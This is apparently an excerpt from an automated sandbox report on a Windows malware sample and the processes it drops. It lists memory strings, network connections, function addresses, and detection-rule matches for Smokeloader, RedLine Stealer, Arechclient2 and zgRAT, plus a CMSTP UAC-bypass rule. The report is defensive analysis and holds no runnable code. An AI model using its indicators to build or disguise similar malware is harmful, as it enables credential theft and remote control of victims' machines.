                            Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                            Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownHTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.7:49715 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0081D120 GetClientRect,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,std::_Xinvalid_argument,AlphaBlend,AlphaBlend,BitBlt,18_2_0081D120
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C84A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,18_2_6C84A5AA

                            System Summary

                            barindex
                            Source: 22.2.cmd.exe.52f0e64.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 22.2.cmd.exe.52f0264.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 31.2.cmd.exe.54dd976.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 22.2.cmd.exe.52ac976.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 31.2.cmd.exe.5521e64.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 18.2.UniversalInstaller.exe.43e915b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.36f286d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.373615b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 31.2.cmd.exe.5521264.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 18.2.UniversalInstaller.exe.43a586d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 0000000A.00000002.1687815536.000000000406C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C25B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,10_2_6C25B700
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C25B8C0 rand_s,NtQueryVirtualMemory,10_2_6C25B8C0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C25B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,10_2_6C25B910
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,10_2_6C1FF280
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_0040EA54 NtQuerySystemInformation,13_2_0040EA54
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0041B84B0_2_0041B84B
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040BA800_2_0040BA80
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040C2AC0_2_0040C2AC
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_004123A00_2_004123A0
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040F4410_2_0040F441
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040BD2A0_2_0040BD2A
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0042153C0_2_0042153C
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040C6A00_2_0040C6A0
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_004087610_2_00408761
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0041BF690_2_0041BF69
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040B70E0_2_0040B70E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040BFF10_2_0040BFF1
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432BCE70_2_0432BCE7
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432C5130_2_0432C513
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043326070_2_04332607
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432F6A80_2_0432F6A8
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432BF910_2_0432BF91
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432C9070_2_0432C907
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432B9750_2_0432B975
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043289C80_2_043289C8
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432C2580_2_0432C258
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0433BAB20_2_0433BAB2
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1F35A010_2_6C1F35A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C26542B10_2_6C26542B
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C26AC0010_2_6C26AC00
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C235C1010_2_6C235C10
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C242C1010_2_6C242C10
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C20544010_2_6C205440
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C26545C10_2_6C26545C
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2534A010_2_6C2534A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C25C4A010_2_6C25C4A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C206C8010_2_6C206C80
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C236CF010_2_6C236CF0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2064C010_2_6C2064C0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C21D4D010_2_6C21D4D0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1FD4E010_2_6C1FD4E0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C20FD0010_2_6C20FD00
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C22051210_2_6C220512
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C21ED1010_2_6C21ED10
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2585F010_2_6C2585F0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C230DD010_2_6C230DD0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C259E3010_2_6C259E30
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C24560010_2_6C245600
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C237E1010_2_6C237E10
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C266E6310_2_6C266E63
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C21464010_2_6C214640
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C242E4E10_2_6C242E4E
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1FC67010_2_6C1FC670
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C219E5010_2_6C219E50
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C233E5010_2_6C233E50
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C254EA010_2_6C254EA0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C25E68010_2_6C25E680
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C215E9010_2_6C215E90
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2676E310_2_6C2676E3
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C20FEF010_2_6C20FEF0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1FBEF010_2_6C1FBEF0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C209F0010_2_6C209F00
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C23771010_2_6C237710
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2477A010_2_6C2477A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C226FF010_2_6C226FF0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1FDFE010_2_6C1FDFE0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C23B82010_2_6C23B820
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C24482010_2_6C244820
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C20781010_2_6C207810
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C23F07010_2_6C23F070
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C21885010_2_6C218850
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C21D85010_2_6C21D850
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2260A010_2_6C2260A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C21C0E010_2_6C21C0E0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2358E010_2_6C2358E0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2650C710_2_6C2650C7
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C20D96010_2_6C20D960
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C24B97010_2_6C24B970
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C26B17010_2_6C26B170
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C21A94010_2_6C21A940
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C22D9B010_2_6C22D9B0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C23519010_2_6C235190
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C25299010_2_6C252990
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1FC9A010_2_6C1FC9A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C239A6010_2_6C239A60
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C224AA010_2_6C224AA0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C20CAB010_2_6C20CAB0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C262AB010_2_6C262AB0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C26BA9010_2_6C26BA90
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1F22A010_2_6C1F22A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C211AF010_2_6C211AF0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C23E2F010_2_6C23E2F0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C238AC010_2_6C238AC0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C23D32010_2_6C23D320
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C20C37010_2_6C20C370
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1F534010_2_6C1F5340
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C1FF38010_2_6C1FF380
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2653C810_2_6C2653C8
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C37AC3010_2_6C37AC30
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C366C0010_2_6C366C00
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2AAC6010_2_6C2AAC60
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C29ECC010_2_6C29ECC0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2FECD010_2_6C2FECD0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C36ED7010_2_6C36ED70
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C428D2010_2_6C428D20
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3CAD5010_2_6C3CAD50
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C42CDC010_2_6C42CDC0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2A4DB010_2_6C2A4DB0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C336D9010_2_6C336D90
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C380E2010_2_6C380E20
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C33EE7010_2_6C33EE70
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C326E9010_2_6C326E90
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2AAEC010_2_6C2AAEC0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C340EC010_2_6C340EC0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3E0F2010_2_6C3E0F20
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2A6F1010_2_6C2A6F10
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C362F7010_2_6C362F70
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C30EF4010_2_6C30EF40
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3E8FB010_2_6C3E8FB0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2AEFB010_2_6C2AEFB0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C37EFF010_2_6C37EFF0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2A0FE010_2_6C2A0FE0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2F082010_2_6C2F0820
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C32A82010_2_6C32A820
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C37484010_2_6C374840
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3A68E010_2_6C3A68E0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2F690010_2_6C2F6900
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2D896010_2_6C2D8960
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3609B010_2_6C3609B0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3309A010_2_6C3309A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C35A9A010_2_6C35A9A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3BC9E010_2_6C3BC9E0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2D49F010_2_6C2D49F0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C358A3010_2_6C358A30
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C34EA0010_2_6C34EA00
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C31CA7010_2_6C31CA70
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C31EA8010_2_6C31EA80
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2A8BAC10_2_6C2A8BAC
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C340BA010_2_6C340BA0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3A6BE010_2_6C3A6BE0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C32A43010_2_6C32A430
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C30442010_2_6C304420
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2B846010_2_6C2B8460
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3CA48010_2_6C3CA480
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C33A4D010_2_6C33A4D0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C2E64D010_2_6C2E64D0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0080406018_2_00804060
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0080212018_2_00802120
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0082613018_2_00826130
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0081B15018_2_0081B150
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0081439018_2_00814390
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0082039018_2_00820390
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0085555018_2_00855550
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0080D57018_2_0080D570
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_008596E018_2_008596E0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0080A6F018_2_0080A6F0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_008266F018_2_008266F0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_008037B018_2_008037B0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0081F84018_2_0081F840
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0084CAA018_2_0084CAA0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_00859A0018_2_00859A00
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0082FC1018_2_0082FC10
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_00861DE018_2_00861DE0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C924D8F18_2_6C924D8F
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C923D1618_2_6C923D16
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C93371C18_2_6C93371C
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C89D24D18_2_6C89D24D
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: String function: 6C42DAE0 appears 31 times
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: String function: 6C2C3620 appears 32 times
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: String function: 6C2394D0 appears 90 times
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: String function: 6C22CBE8 appears 134 times
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: String function: 6C4209D0 appears 121 times
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: String function: 004043B0 appears 316 times
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: String function: 04321D46 appears 39 times
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: String function: 004275A4 appears 43 times
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: String function: 0434780B appears 43 times
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: String function: 00409CC0 appears 48 times
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: String function: 04321BE3 appears 40 times
